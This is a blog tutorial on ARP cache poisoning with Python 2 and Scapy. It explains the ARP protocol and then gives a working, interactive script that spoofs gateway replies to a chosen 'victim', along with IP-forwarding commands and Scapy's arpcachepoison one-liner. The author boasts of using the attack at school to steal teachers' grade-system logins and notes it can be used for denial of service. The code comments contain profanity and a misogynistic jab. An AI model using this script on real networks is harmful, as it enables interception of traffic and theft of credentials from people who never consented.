Monday, 18 April 2016

ARP Cache Poisoning Via Python


Here is a tutorial on using python to ARP cache poison on a local network.

I am using Arch linux and Python 2.7

Intro to ARP

Before we jump into the code you need to understand what ARP is, what it does and the structure of it's packets. ARP stands for Address Resolution Protocol. The function of it is to associate an IP address with its MAC address. The reason we need the MAC in the first place is because layer 2 [data link] of the osi model communicates via MAC addresses.

It is silly to send out an ARP request every time you needed to reach another device, so that is where the ARP table comes in. The table is a cache of IP addresses and their associated MACs. When you want to send info or connect to something, the computer checks its ARP table if it has the IP and MAC already, if so it sends off the data.

Normally an ARP transaction starts with a request, then it gets a response. But the funny thing, and why this attack works, is you can send a reply even though no request was sent. The computer sees the reply and reacts like it sent a request, even though it didn't, and updates the ARP table anyway.

But Why?

You might be wondering why we would want to do this in the first place. Well, every device communicates on layer 2, including your router or default gateway. So if you forge an ARP reply to look like it came from the gateway with your personal MAC address, you will now receive all layer 2 traffic from the target that was meant for the gateway.

This is what is known as a Man in the Middle attack or MitM. If you forward the traffic to the gateway you are now sitting between the target and the internet effectively sniffing their traffic. You can see where they are going, you could sniff plain text usernames and passwords, emails, irc, etc... I've even used this in school to grab login details from teachers for the program they use to log grades and such. You can DoS people by not forwarding their traffic. There is a lot you can do here.

Digging Further

Here is a visual of an ARP header:


Hardware type: Is what we are sending on, our case is Ethernet, but there are others such as IEEE 802, Serial Line, LocalTalk, etc.. Can find more here 16 bits
Protocol Type: Is IP. 16 bits
HW addr lth: Hardware address length is. 8 bits [MAC address lenght]
P addr lth: Protocol address length is. 8 bits [IP address]
Opcode: Defines request or response. 16 bits
The last four are self explainatory.

We could use raw sockets and build the ethernet frame and arp header by hand, but there are easier ways. I might eventually write another tutorial or post a snippet of doing this, but for now we are only talking about ARP poisoning. So now onto the code.

Le Code

I am using Python 2.7 and you will need to install Scapy
Code
pip2 install scapy

Code: Python
  1. #! /usr/bin/python2
  2.  
  3. # I guess scapy requires tcpdump to rid
  4. #  fucking runtime log warnings... :/
  5. #  pacman -S tcpdump
  6.  
  7. # ip forrwarding until reboot
  8. #  sysctl net.ipv4.ip_forward=1
  9. #  echo 1 > /proc/sys/net/ipv4/ip_forward
  10.  
  11. # scapy == women, use logging to stop it from
  12. #  yelling at you over stupid shit
  13. import logging
  14. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  15.  
  16. from scapy.all import *
  17. import time, sys, os, re
  18.  
  19. # get mac from an ip on lan via icmp
  20. #  you can use ARP to get it, but that
  21. #  can be your homework assignment
  22. def getRemoteMac(target):
  23.         ping = IP(dst=target)/ICMP()
  24.         ping_reply = sr1(ping,verbose=0,timeout=2)
  25.         if not ping_reply:
  26.                 print "No reply, invalid target. Suicide?"
  27.                 sys.exit()
  28.         else:
  29.                 cmd_response = os.popen("arp -n '%s'" % target).read()
  30.                 mac = re.search(r"\w+:\w+:\w+:\w+:\w+:\w+", cmd_response)
  31.                 mac = mac.group() #should only be one motherfucker
  32.         return mac
  33.  
  34. # Linux only, Windows users have another homework assignment here
  35. def getOwnMac(interface):
  36.         fd = open("/sys/class/net/%s/address" % interface , "r")
  37.         mac = fd.read()
  38.         fd.close()
  39.         return mac.strip()
  40.        
  41. # Could expand to see which interface is UP or DOWN
  42. #  also could use to get local mac address as well
  43. #  more homework you lazy cunt, lol
  44. def getInterfaces():
  45.         raw = os.popen("ip link show").read()
  46.         interface = re.findall(r"\d: \w+:", raw)
  47.         for i in interface:
  48.                 print i[:-1]
  49.  
  50. op = 2 #op code for ARP reply, 1 is a request
  51.  
  52. # Get required info. Could just use argvs
  53. #  but I like the interactivity
  54. getInterfaces()
  55. interface = str(raw_input("Interface: "))
  56. victim_ip = str(raw_input("Victim IP: "))
  57. gateway_ip = str(raw_input("Gateway IP: "))
  58. own_mac = getOwnMac(interface)
  59.  
  60. # genorate target arp header
  61. arp = ARP(op=op,
  62.           psrc=gateway_ip,
  63.           pdst=victim_ip,
  64.           hwdst=own_mac)
  65.  
  66. # Start cache poisen. I don't have any
  67. #  graceful closures because I'm an asshole.
  68. #  A gentalmen would catch a ctrl+c and
  69. #  revert the ARP tables. Meh.
  70. print "running..."
  71. while True:
  72.         send(arp, verbose=0)
  73.         time.sleep(1.5)
  74.  

Most of this is helping functions and comments. The only real relevant part is at the end. You only really need 2 or three lines of code if you hard code the options like the ip addresses and mac addresses. The comments should explain the code well enough so I'm not going to write a line by line explanation here.

You can also run Scapy interactively which has a built-in arp poison method.
Code
arpcachepoison("your ip", "target ip")



Ref Material
Sites:
http://www.networksorcery.com/enp/protocol/arp.htm
https://en.wikipedia.org/wiki/Address_Resolution_Protocol
https://en.wikipedia.org/wiki/ARP_spoofing

Scapy:
http://www.secdev.org/projects/scapy/doc/usage.html
http://www.secdev.org/projects/scapy/demo.html
http://packetlife.net/blog/2011/may/23/introduction-scapy/

Books:
http://archive.evilzone.org/smf/ebooks/python-penetration-testing-essentials-2015/?action=dlattach;attach=5476
http://upload.evilzone.org/?page=download&file=BNXpJhMfUFQxXwH6a0bb03ASN8wT0fkZ2wNX6aWYfhr2ZZ7mfu
http://archive.evilzone.org/smf/ebooks/understanding-network-hacks-attack-and-defense-with-python-2015/?action=dlattach;attach=5475

Example using raw sockets:
https://archive.evilzone.org/smf/scripting-languages/%28python%29arp-poison-using-raw-sockets/
 
Thankyou
 
Bye! 

No comments :

Post a Comment

Super Blog Directory